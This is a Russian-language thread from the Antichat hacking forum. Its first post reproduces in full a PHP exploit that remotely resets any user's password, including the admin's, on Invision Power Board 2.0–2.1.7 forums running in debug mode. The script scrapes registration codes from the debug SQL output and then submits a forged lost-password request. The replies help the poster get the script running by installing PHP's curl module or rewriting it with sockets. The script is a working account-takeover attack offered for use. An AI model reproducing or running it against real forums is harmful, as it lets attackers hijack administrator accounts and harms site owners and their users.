Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit

   

Опции темы

Поиск в этой теме

Опции просмотра

Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit   #1   20.11.2006, 00:53 nightmare007 Новичок Регистрация: 28.10.2006 Сообщений: 23 Провел на форуме: 125281 Репутация: 1 Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit Так.... PHP код: <?php /*  Debug Mode password change vulnerability  Affects Invision Power Borard 2.0.0 to 2.1.7  by Rapigator    This works if:  "Debug Level" is set to 3  or  Enable SQL Debug Mode is turned on    In General Configuration of the forum software. */ // The forum's address up to and including 'index.php' $site = "http://localhost/forums/index.php"; // An existing user's login name $name = "admin"; // The new password(3-32 characters) $pass = "1234"; // You can use a proxy... // $proxy = "1.2.3.4:8080"; // ----------------------------- $site .= "?"; $suffix = ""; $name = urlencode($name); $pass = urlencode($pass); $curl = curl_init($site.'act=Reg&CODE=10'); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {     $prefix = $regs[1];     $regid = $regs[2];     $regcode = $regs[3]; } else {     $suffix = "&debug=1";     $curl = curl_init($site.'act=Reg&CODE=10'.$suffix);     curl_setopt($curl, CURLOPT_PROXY, $proxy);     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);     curl_setopt($curl, CURLOPT_TIMEOUT, 10);     $page = curl_exec($curl);     curl_close($curl);     if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {         $prefix = $regs[1];         $regid = $regs[2];         $regcode = $regs[3];     } } if (!isset($regid) || !isset($regcode)) {     echo "Error: Probably not vulnerable, or no forum found";     exit; } $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {     change_pass($regcode,$regid,$regs[1],$regs[2]); } if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {     change_pass($regcode,$regid,$regs[1],$regs[2]); } function change_pass($regcode,$regid,$vid,$userid) {     global $site, $proxy, $name, $pass;     $curl = curl_init($site.$suffix);     curl_setopt($curl, CURLOPT_PROXY, $proxy);     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);     curl_setopt($curl, CURLOPT_POST, 1);     curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");     curl_setopt($curl, CURLOPT_TIMEOUT, 10);     $page = curl_exec($curl);     curl_close($curl);     echo "Password Changed!";     exit; } ?> # milw0rm.com [2006-11-01] Пробывал запустить это чудо но написало Цитата: Fatal error: Call to undefined function curl_init() in C:\ipb217.php on line 37 чё там не так в 37 строке подскожите чё исправить   nightmare007 Посмотреть профиль Репутация Отправить личное сообщение для nightmare007 Найти все сообщения от nightmare007 Добавить в друзья   #2   20.11.2006, 02:08 }{0TT@БЬ)Ч Постоянный Регистрация: 20.01.2006 Сообщений: 302 Провел на форуме: 3536885 Репутация: 447 Это уже вроде здесь разжовывали НЕ ЗАБЫВАЙ юзать поиск http://forum.antichat.ru/thread26349.html Последний раз редактировалось }{0TT@БЬ)Ч; 20.11.2006 в 02:21..   }{0TT@БЬ)Ч Посмотреть профиль Репутация Отправить личное сообщение для }{0TT@БЬ)Ч Найти все сообщения от }{0TT@БЬ)Ч Добавить в друзья   #3   20.11.2006, 08:32 _Great_ Флудер Регистрация: 27.12.2005 Сообщений: 2,372 Провел на форуме: 5339610 Репутация: 4360 Нет модуля Curl для Php. Правь все на сокеты.   _Great_ Посмотреть профиль Репутация Отправить личное сообщение для _Great_ Найти все сообщения от _Great_ Добавить в друзья

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit	Rebz	Форумы	10	04.05.2009 15:49
Качаем с рапиды и меги нахаляву	gemaglabin	Болталка	38	07.12.2006 03:04
Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection	splitefire	Форумы	4	18.10.2006 14:38

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход Мой кабинет Личные сообщения Подписки Кто на форуме Поиск по форуму Главная страница форума ИНФО     Мировые новости     Статьи         Авторские статьи         Чужие Статьи Безопасность и Уязвимости     Избранное     Уязвимости         Сценарии/CMF/СMS         Форумы         Расшифровка хешей         E-Mail         ICQ         Чаты     Безопасность         *nix         Soft - *nix         Windows         Soft - Windows         Анонимность         АнтиАдмин         Защита ОС: вирусы, антивирусы, файрволы.     Электроника и Фрикинг         Новости мира "железа"         Сотовый фрикинг         Аппаратное обеспечение         Схемы и программы         Телефония и связь         Беспроводные технологии/WPAN/WLAN     Администрирование         *nix системы         Windows системы         AntiDDos - АнтиДДОС     Проверка на уязвимости Программирование     PHP, PERL, MySQL, JavaScript         ПО для Web разработчика     С/С++, C#, Delphi, .NET, Asm     Реверсинг SЕО/Финансовые задачи/Социальные сети     SЕО - тонкости, методы раскрутки         Партнерки         Услуги, Покупка и Продажа в SEO         Платежные системы: Webmoney, Yandex Деньги, РБК Деньги и т. д.         Белые методы раскрутки         Черные методы раскрутки         Обсуждение Ваших сайтов         Статьи     Покупка, Продажа, Обмен         Разное - Покупка, продажа, обмен         VPN, Proxy, Socks - Покупка, продажа         Хостинг, Dedicated, VDS, Сервера - Покупка, продажа         Инвайты, mails, базы - Покупка, продажа         Доступы, shells, ftp - Покупка, продажа         Мобильная связь, СМС - Покупка, продажа         Трафик, лоады, инсталлы, загрузки - Покупка, продажа         О Работе         Покупка, продажа, услуги в Соц. Сетях         ICQ - Покупка, продажа     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Хостинги - Hostings Оффтоп     Болталка     Forum for discussion of ANTICHAT     Квесты         Antichat's Quest Antichat     Правила форума     Новости форума     Video.Antichat         Комментарии к видео